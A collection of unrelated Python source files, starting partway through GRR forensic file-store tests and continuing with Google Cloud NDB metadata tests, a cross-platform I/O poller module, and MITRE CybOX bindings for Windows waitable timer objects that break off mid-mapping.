src_data_fd = StringIO.StringIO(src_data)
src_fd.AppendContent(src_data_fd)
fs.AddFile(src_fd)
# Reset file pointers
src_fd.Seek(0)
fake_store1.dest_file.Seek(0)
fake_store2.dest_file.Seek(0)
# Check file content got written to both data stores.
self.assertEqual(src_data, fake_store1.dest_file.Read(-1))
self.assertEqual(src_data, fake_store2.dest_file.Read(-1))
def testGetByPriority(self):
priority1 = aff4.FACTORY.Create("aff4:/files/1", "FileStore", mode="rw",
token=self.token)
priority1.PRIORITY = 1
priority1.Set(priority1.Schema.ACTIVE(False))
priority2 = aff4.FACTORY.Create("aff4:/files/2", "FileStore", mode="rw",
token=self.token)
priority2.PRIORITY = 2
priority3 = aff4.FACTORY.Create("aff4:/files/3", "FileStore", mode="rw",
token=self.token)
priority3.PRIORITY = 3
fs = aff4.FACTORY.Open(filestore.FileStore.PATH, "FileStore",
token=self.token)
with utils.Stubber(fs, "OpenChildren",
lambda: [priority3, priority1, priority2]):
child_list = list(fs.GetChildrenByPriority())
self.assertEqual(child_list[0].PRIORITY, 2)
self.assertEqual(child_list[1].PRIORITY, 3)
child_list = list(fs.GetChildrenByPriority(allow_external=False))
self.assertEqual(child_list[0].PRIORITY, 2)
class HashFileStoreTest(test_lib.AFF4ObjectTest):
"""Tests for hash file store functionality."""
def setUp(self):
super(HashFileStoreTest, self).setUp()
client_ids = self.SetupClients(1)
self.client_id = client_ids[0]
@staticmethod
def AddFileToFileStore(pathspec=None, client_id=None, token=None):
"""Adds file with given pathspec to the hash file store."""
if pathspec is None:
raise ValueError("pathspec can't be None")
if client_id is None:
raise ValueError("client_id can't be None")
urn = aff4.AFF4Object.VFSGRRClient.PathspecToURN(pathspec, client_id)
client_mock = action_mocks.ActionMock("TransferBuffer", "StatFile",
"HashBuffer")
for _ in test_lib.TestFlowHelper(
"GetFile", client_mock, token=token, client_id=client_id,
pathspec=pathspec):
pass
auth_state = rdfvalue.GrrMessage.AuthorizationState.AUTHENTICATED
flow.Events.PublishEvent(
"FileStore.AddFileToStore",
rdfvalue.GrrMessage(payload=urn, auth_state=auth_state),
token=token)
worker = test_lib.MockWorker(token=token)
worker.Simulate()
def AddFile(self, path):
"""Add file with a subpath (relative to winexec_img.dd) to the store."""
pathspec = rdfvalue.PathSpec(
pathtype=rdfvalue.PathSpec.PathType.OS,
path=os.path.join(self.base_path, "winexec_img.dd"))
pathspec.Append(path=path, pathtype=rdfvalue.PathSpec.PathType.TSK)
return self.AddFileToFileStore(pathspec, client_id=self.client_id,
token=self.token)
def testListHashes(self):
self.AddFile("/Ext2IFS_1_10b.exe")
hashes = list(aff4.HashFileStore.ListHashes(token=self.token))
self.assertEqual(len(hashes), 5)
self.assertTrue(rdfvalue.FileStoreHash(
fingerprint_type="pecoff", hash_type="md5",
hash_value="a3a3259f7b145a21c7b512d876a5da06") in hashes)
self.assertTrue(rdfvalue.FileStoreHash(
fingerprint_type="pecoff", hash_type="sha1",
hash_value="019bddad9cac09f37f3941a7f285c79d3c7e7801") in hashes)
self.assertTrue(rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a") in hashes)
self.assertTrue(rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="sha1",
hash_value="7dd6bee591dfcb6d75eb705405302c3eab65e21a") in hashes)
self.assertTrue(rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="sha256",
hash_value="0e8dc93e150021bb4752029ebbff51394aa36f06"
"9cf19901578e4f06017acdb5") in hashes)
def testListHashesWithAge(self):
with utils.Stubber(time, "time", lambda: 42):
self.AddFile("/Ext2IFS_1_10b.exe")
hashes = list(aff4.HashFileStore.ListHashes(token=self.token, age=41e6))
self.assertEqual(len(hashes), 0)
hashes = list(aff4.HashFileStore.ListHashes(token=self.token, age=43e6))
self.assertEqual(len(hashes), 5)
hashes = list(aff4.HashFileStore.ListHashes(token=self.token))
self.assertEqual(len(hashes), 5)
def testHashAgeUpdatedWhenNewHitAddedWithinAFF4IndexCacheAge(self):
# Check that there are no hashes.
hashes = list(aff4.HashFileStore.ListHashes(token=self.token,
age=(41e6, 1e10)))
self.assertEqual(len(hashes), 0)
with utils.Stubber(time, "time", lambda: 42):
self.AddFileToFileStore(
rdfvalue.PathSpec(pathtype=rdfvalue.PathSpec.PathType.OS,
path=os.path.join(self.base_path, "empty_file")),
client_id=self.client_id, token=self.token)
hashes = list(aff4.HashFileStore.ListHashes(token=self.token,
age=(41e6, 1e10)))
self.assertTrue(hashes)
hits = list(aff4.HashFileStore.GetClientsForHash(hashes[0],
token=self.token))
self.assertEqual(len(hits), 1)
latest_time = 42 + config_lib.CONFIG["AFF4.intermediate_cache_age"] - 1
with utils.Stubber(time, "time", lambda: latest_time):
self.AddFileToFileStore(
rdfvalue.PathSpec(
pathtype=rdfvalue.PathSpec.PathType.OS,
path=os.path.join(self.base_path, "a", "b", "c", "helloc.txt")),
client_id=self.client_id, token=self.token)
    # Check that now we have two hits for the previously added hash.
hits = list(aff4.HashFileStore.GetClientsForHash(hashes[0],
token=self.token))
self.assertEqual(len(hits), 2)
# Check that new hit doesn't affect hash age.
hashes = list(aff4.HashFileStore.ListHashes(token=self.token,
age=(43e6, 1e10)))
self.assertFalse(hashes)
def testHashAgeUpdatedWhenNewHitAddedAfterAFF4IndexCacheAge(self):
# Check that there are no hashes.
hashes = list(aff4.HashFileStore.ListHashes(token=self.token,
age=(41e6, 1e10)))
self.assertEqual(len(hashes), 0)
with utils.Stubber(time, "time", lambda: 42):
self.AddFileToFileStore(
rdfvalue.PathSpec(pathtype=rdfvalue.PathSpec.PathType.OS,
path=os.path.join(self.base_path, "empty_file")),
client_id=self.client_id, token=self.token)
hashes = list(aff4.HashFileStore.ListHashes(token=self.token,
age=(41e6, 1e10)))
self.assertTrue(hashes)
hits = list(aff4.HashFileStore.GetClientsForHash(hashes[0],
token=self.token))
self.assertEqual(len(hits), 1)
latest_time = 42 + config_lib.CONFIG["AFF4.intermediate_cache_age"] + 1
with utils.Stubber(time, "time", lambda: latest_time):
self.AddFileToFileStore(
rdfvalue.PathSpec(
pathtype=rdfvalue.PathSpec.PathType.OS,
path=os.path.join(self.base_path, "a", "b", "c", "helloc.txt")),
client_id=self.client_id, token=self.token)
    # Check that now we have two hits for the previously added hash.
hits = list(aff4.HashFileStore.GetClientsForHash(hashes[0],
token=self.token))
self.assertEqual(len(hits), 2)
# Check that new hit affects hash age.
hashes = list(aff4.HashFileStore.ListHashes(token=self.token,
age=(43e6, 1e10)))
self.assertTrue(hashes)
def testGetClientsForHash(self):
self.AddFile("/Ext2IFS_1_10b.exe")
self.AddFile("/idea.dll")
hits = list(aff4.HashFileStore.GetClientsForHash(rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a"), token=self.token))
self.assertListEqual(hits, [self.client_id.Add(
"fs/tsk").Add(self.base_path).Add("winexec_img.dd/Ext2IFS_1_10b.exe")])
def testGetClientsForHashWithAge(self):
with utils.Stubber(time, "time", lambda: 42):
self.AddFile("/Ext2IFS_1_10b.exe")
self.AddFile("/idea.dll")
hits = list(aff4.HashFileStore.GetClientsForHash(
rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a"),
age=41e6,
token=self.token))
self.assertEqual(len(hits), 0)
hits = list(aff4.HashFileStore.GetClientsForHash(
rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a"),
age=43e6,
token=self.token))
self.assertEqual(len(hits), 1)
hits = list(aff4.HashFileStore.GetClientsForHash(
rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a"),
token=self.token))
self.assertEqual(len(hits), 1)
def testGetClientsForHashes(self):
self.AddFile("/Ext2IFS_1_10b.exe")
self.AddFile("/idea.dll")
hash1 = rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a")
hash2 = rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="sha1",
hash_value="e1f7e62b3909263f3a2518bbae6a9ee36d5b502b")
hits = dict(aff4.HashFileStore.GetClientsForHashes([hash1, hash2],
token=self.token))
self.assertEqual(len(hits), 2)
self.assertListEqual(hits[hash1], [self.client_id.Add(
"fs/tsk").Add(self.base_path).Add("winexec_img.dd/Ext2IFS_1_10b.exe")])
self.assertListEqual(hits[hash2], [self.client_id.Add(
"fs/tsk").Add(self.base_path).Add("winexec_img.dd/idea.dll")])
def testGetClientsForHashesWithAge(self):
with utils.Stubber(time, "time", lambda: 42):
self.AddFile("/Ext2IFS_1_10b.exe")
self.AddFile("/idea.dll")
hash1 = rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="md5",
hash_value="bb0a15eefe63fd41f8dc9dee01c5cf9a")
hash2 = rdfvalue.FileStoreHash(
fingerprint_type="generic", hash_type="sha1",
hash_value="e1f7e62b3909263f3a2518bbae6a9ee36d5b502b")
hits = dict(aff4.HashFileStore.GetClientsForHashes([hash1, hash2],
age=41e6,
token=self.token))
self.assertEqual(len(hits), 0)
hits = dict(aff4.HashFileStore.GetClientsForHashes([hash1, hash2],
age=43e6,
token=self.token))
self.assertEqual(len(hits), 2)
hits = dict(aff4.HashFileStore.GetClientsForHashes([hash1, hash2],
token=self.token))
self.assertEqual(len(hits), 2)
|
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
System tests for metadata.
"""
import pytest
from google.cloud import ndb
from test_utils import retry
_retry_assertion_errors = retry.RetryErrors(AssertionError)
@pytest.mark.usefixtures("client_context")
def test_kind_metadata(dispose_of):
from google.cloud.ndb.metadata import Kind
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
class MyKind(ndb.Model):
bar = ndb.StringProperty()
entity1 = AnyKind(foo=1, id="x", namespace="_test_namespace_")
entity1.put()
dispose_of(entity1.key._key)
entity2 = MyKind(bar="x", id="x", namespace="_test_namespace_")
entity2.put()
dispose_of(entity2.key._key)
@_retry_assertion_errors
def query_metadata():
query = ndb.Query(kind=Kind.KIND_NAME, namespace="_test_namespace_")
results = query.fetch()
kinds = [result.kind_name for result in results]
assert all(kind in kinds for kind in ["AnyKind", "MyKind"])
query_metadata()
@pytest.mark.usefixtures("client_context")
def test_get_kinds(dispose_of):
from google.cloud.ndb.metadata import get_kinds
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
class MyKind(ndb.Model):
bar = ndb.StringProperty()
class OtherKind(ndb.Model):
baz = ndb.IntegerProperty()
class SomeKind(ndb.Model):
qux = ndb.StringProperty()
entity1 = AnyKind(foo=1)
entity1.put()
dispose_of(entity1.key._key)
entity2 = MyKind(bar="a")
entity2.put()
dispose_of(entity2.key._key)
entity3 = OtherKind(baz=2)
entity3.put()
dispose_of(entity3.key._key)
entity4 = SomeKind(qux="a")
entity4.put()
dispose_of(entity4.key._key)
@_retry_assertion_errors
def query_metadata():
kinds = get_kinds()
assert all(
kind in kinds for kind in ["AnyKind", "MyKind", "OtherKind", "SomeKind"]
)
kinds = get_kinds(start="N")
assert all(kind in kinds for kind in ["OtherKind", "SomeKind"]) != []
assert not any(kind in kinds for kind in ["AnyKind", "MyKind"])
kinds = get_kinds(end="N")
assert all(kind in kinds for kind in ["AnyKind", "MyKind"]) != []
assert not any(kind in kinds for kind in ["OtherKind", "SomeKind"])
kinds = get_kinds(start="L", end="P")
assert all(kind in kinds for kind in ["MyKind", "OtherKind"]) != []
assert not any(kind in kinds for kind in ["AnyKind", "SomeKind"])
query_metadata()
@pytest.mark.usefixtures("client_context")
def test_namespace_metadata(dispose_of):
from google.cloud.ndb.metadata import Namespace
# Why is this not necessary for Kind?
Namespace._fix_up_properties()
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
entity1 = AnyKind(foo=1, namespace="_test_namespace_")
entity1.put()
dispose_of(entity1.key._key)
entity2 = AnyKind(foo=2, namespace="_test_namespace_2_")
entity2.put()
dispose_of(entity2.key._key)
@_retry_assertion_errors
def query_metadata():
query = ndb.Query(kind=Namespace.KIND_NAME)
results = query.fetch()
names = [result.namespace_name for result in results]
assert all(name in names for name in ["_test_namespace_", "_test_namespace_2_"])
query_metadata()
@pytest.mark.usefixtures("client_context")
def test_get_namespaces(dispose_of):
from google.cloud.ndb.metadata import get_namespaces
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
entity1 = AnyKind(foo=1, namespace="CoolNamespace")
entity1.put()
dispose_of(entity1.key._key)
entity2 = AnyKind(foo=2, namespace="MyNamespace")
entity2.put()
dispose_of(entity2.key._key)
entity3 = AnyKind(foo=3, namespace="OtherNamespace")
entity3.put()
dispose_of(entity3.key._key)
@_retry_assertion_errors
def query_metadata():
names = get_namespaces()
assert all(
name in names for name in ["CoolNamespace", "MyNamespace", "OtherNamespace"]
)
names = get_namespaces(start="L")
assert all(name in names for name in ["MyNamespace", "OtherNamspace"]) != []
names = get_namespaces(end="N")
assert all(name in names for name in ["CoolNamespace", "MyNamespace"]) != []
names = get_namespaces(start="D", end="N")
assert all(name in names for name in ["MyNamespace"]) != []
query_metadata()
@pytest.mark.usefixtures("client_context")
def test_property_metadata(dispose_of):
from google.cloud.ndb.metadata import Property
# Why is this not necessary for Kind?
Property._fix_up_properties()
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity1 = AnyKind(foo=1, bar="x")
entity1.put()
dispose_of(entity1.key._key)
@_retry_assertion_errors
def query_metadata():
query = ndb.Query(kind=Property.KIND_NAME)
results = query.fetch()
properties = [
result.property_name for result in results if result.kind_name == "AnyKind"
]
assert properties == ["bar", "foo"]
query_metadata()
@pytest.mark.usefixtures("client_context")
def test_get_properties_of_kind(dispose_of):
from google.cloud.ndb.metadata import get_properties_of_kind
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.IntegerProperty()
qux = ndb.StringProperty()
entity1 = AnyKind(foo=1, bar="x", baz=3, qux="y")
entity1.put()
dispose_of(entity1.key._key)
@_retry_assertion_errors
def query_metadata():
properties = get_properties_of_kind("AnyKind")
assert properties == ["bar", "baz", "foo", "qux"]
properties = get_properties_of_kind("AnyKind", start="c")
assert properties == ["foo", "qux"]
properties = get_properties_of_kind("AnyKind", end="e")
assert properties == ["bar", "baz"]
properties = get_properties_of_kind("AnyKind", start="c", end="p")
assert properties == ["foo"]
query_metadata()
@pytest.mark.usefixtures("client_context")
@pytest.mark.parametrize("namespace", ["DiffNamespace"])
def test_get_properties_of_kind_different_namespace(dispose_of, namespace):
from google.cloud.ndb.metadata import get_properties_of_kind
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.IntegerProperty()
qux = ndb.StringProperty()
entity1 = AnyKind(foo=1, bar="x", baz=3, qux="y", namespace="DiffNamespace")
entity1.put()
dispose_of(entity1.key._key)
@_retry_assertion_errors
def query_metadata():
properties = get_properties_of_kind("AnyKind")
assert properties == ["bar", "baz", "foo", "qux"]
properties = get_properties_of_kind("AnyKind", start="c")
assert properties == ["foo", "qux"]
properties = get_properties_of_kind("AnyKind", end="e")
assert properties == ["bar", "baz"]
properties = get_properties_of_kind("AnyKind", start="c", end="p")
assert properties == ["foo"]
query_metadata()
@pytest.mark.usefixtures("client_context")
def test_get_representations_of_kind(dispose_of):
from google.cloud.ndb.metadata import get_representations_of_kind
class AnyKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.IntegerProperty()
qux = ndb.StringProperty()
entity1 = AnyKind(foo=1, bar="x", baz=3, qux="y")
entity1.put()
dispose_of(entity1.key._key)
@_retry_assertion_errors
def query_metadata():
representations = get_representations_of_kind("AnyKind")
assert representations == {
"bar": ["STRING"],
"baz": ["INT64"],
"foo": ["INT64"],
"qux": ["STRING"],
}
representations = get_representations_of_kind("AnyKind", start="c")
assert representations == {"foo": ["INT64"], "qux": ["STRING"]}
representations = get_representations_of_kind("AnyKind", end="e")
assert representations == {"bar": ["STRING"], "baz": ["INT64"]}
representations = get_representations_of_kind("AnyKind", start="c", end="p")
assert representations == {"foo": ["INT64"]}
query_metadata()
|
|
# Copyright 2016 Facebook Inc.
# Copyright 2016 Douban Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import select
# From python select module and Tornado source
_EPOLLIN = 0x001
_EPOLLPRI = 0x002
_EPOLLOUT = 0x004
_EPOLLERR = 0x008
_EPOLLHUP = 0x010
_EPOLLRDHUP = 0x2000
_EPOLLONESHOT = (1 << 30)
_EPOLLET = (1 << 31)
READ = _EPOLLIN
WRITE = _EPOLLOUT
ERROR = _EPOLLERR | _EPOLLHUP
MASK_ALL = 0xFFFF
class PollerImpl(object):
def poll(self, timeout):
raise NotImplementedError()
def register(self, fd, eventmask):
raise NotImplementedError()
def unregister(self, fd):
raise NotImplementedError()
def modify(self, fd, eventmask):
raise NotImplementedError()
class EpollImpl(PollerImpl):
"""
epoll wrapper. Only usable on Linux.
"""
def __init__(self):
super(EpollImpl, self).__init__()
self._epoll = select.epoll()
def __del__(self):
try:
self._epoll.close()
except:
# Doesn't matter
pass
def register(self, fd, eventmask):
self._epoll.register(fd, eventmask)
def unregister(self, fd):
self._epoll.unregister(fd)
def poll(self, timeout):
return self._epoll.poll(timeout)
def modify(self, fd, eventmask):
return self._epoll.modify(fd, eventmask)
class KQueueImpl(PollerImpl):
"""
kqueue wrapper. Only usable on BSD-like systems.
"""
def __init__(self):
super(KQueueImpl, self).__init__()
self._kqueue = select.kqueue()
self._events = {}
def __del__(self):
try:
self._kqueue.close()
except:
# Doesn't matter
pass
def _control(self, fd, eventmask, flags):
events = []
if eventmask & READ:
events.append(select.kevent(fd, filter=select.KQ_FILTER_READ, flags=flags))
if eventmask & WRITE:
events.append(select.kevent(fd, filter=select.KQ_FILTER_WRITE, flags=flags))
for ev in events:
self._kqueue.control([ev], 0)
def register(self, fd, eventmask):
assert fd not in self._events, 'File already registered'
self._events[fd] = eventmask
if eventmask != 0:
self._control(fd, eventmask, select.KQ_EV_ADD)
def unregister(self, fd):
assert fd in self._events, 'File not registered'
event = self._events.pop(fd)
if event != 0:
self._control(fd, event, select.KQ_EV_DELETE)
def poll(self, timeout):
retval = {}
kevents = self._kqueue.control(None, 1000, timeout)
for kevent in kevents:
ident = kevent.ident
if kevent.filter == select.KQ_FILTER_READ:
retval[ident] = retval.get(ident, 0) | READ
if kevent.filter == select.KQ_FILTER_WRITE:
if kevent.flags & select.KQ_EV_EOF:
retval[ident] = ERROR
else:
retval[ident] = retval.get(ident, 0) | WRITE
if kevent.flags & select.KQ_EV_ERROR:
retval[ident] = retval.get(ident, 0) | ERROR
return retval.items()
def modify(self, fd, eventmask):
self.unregister(fd)
self.register(fd, eventmask)
class PollImpl(PollerImpl):
def __init__(self):
self._poll = select.poll()
def __del__(self):
try:
self._poll.close()
except:
# Doesn't matter
pass
def register(self, fd, eventmask):
self._poll.register(fd, eventmask)
def unregister(self, fd):
self._poll.unregister(fd)
def poll(self, timeout):
return self._poll.poll(timeout)
def modify(self, fd, eventmask):
return self._poll.modify(fd, eventmask)
class SelectImpl(PollerImpl):
def __init__(self):
self._reading = set()
self._writing = set()
self._error = set()
def register(self, fd, eventmask):
if eventmask & READ:
self._reading.add(fd)
if eventmask & WRITE:
self._writing.add(fd)
if eventmask & ERROR:
self._error.add(fd)
def modify(self, fd, eventmask):
self.unregister(fd)
self.register(fd, eventmask)
def poll(self, timeout):
read, write, err = select.select(self._reading, self._writing, self._error, timeout)
events = {}
for fd in read:
events[fd] = events.get(fd, 0) | READ
for fd in write:
events[fd] = events.get(fd, 0) | WRITE
for fd in err:
events[fd] = events.get(fd, 0) | ERROR
return events.items()
def unregister(self, fd):
self._reading.discard(fd)
self._writing.discard(fd)
self._error.discard(fd)
def get_poller():
if hasattr(select, 'epoll'):
# Linux
return EpollImpl()
elif hasattr(select, 'kqueue'):
# BSD
return KQueueImpl()
elif hasattr(select, 'poll'):
# UNIX
return PollImpl()
elif hasattr(select, 'select'):
# Windows et al.
return SelectImpl()
else:
raise OSError('System not supported')
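# Minimal usage sketch (illustrative, not part of this module): watch one end
# of a socket pair for readability using whichever poller get_poller() picks
# for the current platform.
if __name__ == '__main__':
    import socket
    left, right = socket.socketpair()
    poller = get_poller()
    poller.register(left.fileno(), READ)
    right.send(b'ping')
    # Timeout units follow the underlying implementation.
    for fd, event in poller.poll(1.0):
        if fd == left.fileno() and event & READ:
            print(left.recv(4))
    poller.unregister(left.fileno())
    left.close()
    right.close()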
|
|
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
import sys
from mixbox.binding_utils import *
from . import cybox_common
from . import win_handle_object
class WaitableTimerType(cybox_common.BaseObjectPropertyType):
"""WaitableTimerType specifies Windows waitable timer types via a union
of the WaitableTimerTypeEnum type and the atomic xs:string type.
Its base type is the CybOX Core cybox_common.BaseObjectPropertyType, which
permits complex (i.e. regular-expression based) specifications. This
attribute is optional and specifies the expected type for the value of the
specified property."""
subclass = None
superclass = cybox_common.BaseObjectPropertyType
def __init__(self, obfuscation_algorithm_ref=None, refanging_transform_type=None, has_changed=None, delimiter='##comma##', pattern_type=None, datatype='string', refanging_transform=None, is_case_sensitive=True, bit_mask=None, appears_random=None, observed_encoding=None, defanging_algorithm_ref=None, is_obfuscated=None, regex_syntax=None, apply_condition='ANY', trend=None, idref=None, is_defanged=None, id=None, condition=None, valueOf_=None):
super(WaitableTimerType, self).__init__(obfuscation_algorithm_ref, refanging_transform_type, has_changed, delimiter, pattern_type, datatype, refanging_transform, is_case_sensitive, bit_mask, appears_random, observed_encoding, defanging_algorithm_ref, is_obfuscated, regex_syntax, apply_condition, trend, idref, is_defanged, id, condition, valueOf_)
self.datatype = _cast(None, datatype)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if WaitableTimerType.subclass:
return WaitableTimerType.subclass(*args_, **kwargs_)
else:
return WaitableTimerType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_datatype(self): return self.datatype
def set_datatype(self, datatype): self.datatype = datatype
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(WaitableTimerType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, namespace_='WinWaitableTimerObj:', name_='WaitableTimerType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='WaitableTimerType')
if self.hasContent_():
lwrite('>')
lwrite(quote_xml(self.valueOf_))
self.exportChildren(lwrite, level + 1, namespace_, name_, pretty_print=pretty_print)
lwrite('</%s%s>%s' % (namespace_, name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='WinWaitableTimerObj:', name_='WaitableTimerType'):
super(WaitableTimerType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='WaitableTimerType')
if self.datatype is not None:
lwrite(' datatype=%s' % (quote_attrib(self.datatype), ))
def exportChildren(self, lwrite, level, namespace_='WinWaitableTimerObj:', name_='WaitableTimerType', fromsubclass_=False, pretty_print=True):
super(WaitableTimerType, self).exportChildren(lwrite, level, 'WinWaitableTimerObj:', name_, True, pretty_print=pretty_print)
pass
def build(self, node):
self.__sourcenode__ = node
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('datatype', node)
if value is not None:
self.datatype = value
super(WaitableTimerType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class WaitableTimerType
class WindowsWaitableTimerObjectType(cybox_common.ObjectPropertiesType):
"""The WindowsWaitableTimerObjectType is intended to characterize
Windows waitable timer (synchronization) objects."""
subclass = None
superclass = cybox_common.ObjectPropertiesType
def __init__(self, object_reference=None, Custom_Properties=None, xsi_type=None, Handle=None, Name=None, Security_Attributes=None, Type=None):
super(WindowsWaitableTimerObjectType, self).__init__(object_reference, Custom_Properties, xsi_type )
self.Handle = Handle
self.Name = Name
self.Security_Attributes = Security_Attributes
self.Type = Type
def factory(*args_, **kwargs_):
if WindowsWaitableTimerObjectType.subclass:
return WindowsWaitableTimerObjectType.subclass(*args_, **kwargs_)
else:
return WindowsWaitableTimerObjectType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Handle(self): return self.Handle
def set_Handle(self, Handle): self.Handle = Handle
def get_Name(self): return self.Name
def set_Name(self, Name): self.Name = Name
def validate_StringObjectPropertyType(self, value):
# Validate type cybox_common.StringObjectPropertyType, a restriction on None.
pass
def get_Security_Attributes(self): return self.Security_Attributes
def set_Security_Attributes(self, Security_Attributes): self.Security_Attributes = Security_Attributes
def get_Type(self): return self.Type
def set_Type(self, Type): self.Type = Type
def validate_WaitableTimerType(self, value):
# Validate type WaitableTimerType, a restriction on None.
pass
def hasContent_(self):
if (
self.Handle is not None or
self.Name is not None or
self.Security_Attributes is not None or
self.Type is not None or
super(WindowsWaitableTimerObjectType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, namespace_='WinWaitableTimerObj:', name_='WindowsWaitableTimerObjectType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='WindowsWaitableTimerObjectType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s%s>%s' % (namespace_, name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='WinWaitableTimerObj:', name_='WindowsWaitableTimerObjectType'):
super(WindowsWaitableTimerObjectType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='WindowsWaitableTimerObjectType')
def exportChildren(self, lwrite, level, namespace_='WinWaitableTimerObj:', name_='WindowsWaitableTimerObjectType', fromsubclass_=False, pretty_print=True):
super(WindowsWaitableTimerObjectType, self).exportChildren(lwrite, level, 'WinWaitableTimerObj:', name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Handle is not None:
self.Handle.export(lwrite, level, 'WinWaitableTimerObj:', name_='Handle', pretty_print=pretty_print)
if self.Name is not None:
self.Name.export(lwrite, level, 'WinWaitableTimerObj:', name_='Name', pretty_print=pretty_print)
if self.Security_Attributes is not None:
self.Security_Attributes.export(lwrite, level, 'WinWaitableTimerObj:', name_='Security_Attributes', pretty_print=pretty_print)
if self.Type is not None:
self.Type.export(lwrite, level, 'WinWaitableTimerObj:', name_='Type', pretty_print=pretty_print)
def build(self, node):
self.__sourcenode__ = node
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(WindowsWaitableTimerObjectType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Handle':
obj_ = win_handle_object.WindowsHandleObjectType.factory()
obj_.build(child_)
self.set_Handle(obj_)
elif nodeName_ == 'Name':
obj_ = cybox_common.StringObjectPropertyType.factory()
obj_.build(child_)
self.set_Name(obj_)
elif nodeName_ == 'Security_Attributes':
obj_ = cybox_common.StringObjectPropertyType.factory()
obj_.build(child_)
self.set_Security_Attributes(obj_)
elif nodeName_ == 'Type':
obj_ = WaitableTimerType.factory()
obj_.build(child_)
self.set_Type(obj_)
super(WindowsWaitableTimerObjectType, self).buildChildren(child_, node, nodeName_, True)
# end class WindowsWaitableTimerObjectType
GDSClassesMapping = {
'Build_Utility': cybox_common.BuildUtilityType,
'Errors': cybox_common.ErrorsType,
'Time': cybox_common.TimeType,
'Certificate_Issuer': cybox_common.StringObjectPropertyType,
'Metadata': cybox_common.MetadataType,
'Hash': cybox_common.HashType,
'Information_Source_Type': cybox_common.ControlledVocabularyStringType,
'Block_Hash_Value': cybox_common.HashValueType,
'Fuzzy_Hash_Structure': cybox_common.FuzzyHashStructureType,
'SubDatum': cybox_common.MetadataType,
'Segment_Hash': cybox_common.HashValueType,
